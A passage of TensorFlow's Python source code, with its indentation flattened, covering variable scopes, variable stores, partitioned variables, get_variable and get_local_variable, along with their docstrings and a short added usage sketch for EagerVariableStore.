reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
        # ResourceVariables don't have an op associated with them, so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(
1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
    # If dtype is DT_FLOAT, provide a glorot_uniform initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: Do we need to add support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
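# A minimal, hedged usage sketch (not part of the original module): it shows how
# an EagerVariableStore collects variables created through get_variable under
# eager execution, and that copy() creates new, independent ResourceVariables.
# Assumes eager execution is enabled (the default in TF 2.x) so the variables
# support .assign() and .numpy().
def _sketch_eager_variable_store_copy():
  container = EagerVariableStore()
  with container.as_default():
    v = get_variable("v", initializer=[1.0, 1.0])
  snapshot = container.copy()      # new, independent copies of the variables
  v.assign([5.0, 5.0])             # mutate the original store's variable
  copied_v = snapshot.variables()[0]
  # v now holds [5., 5.] while copied_v still holds [1., 1.].
  return v.numpy(), copied_v.numpy()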
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
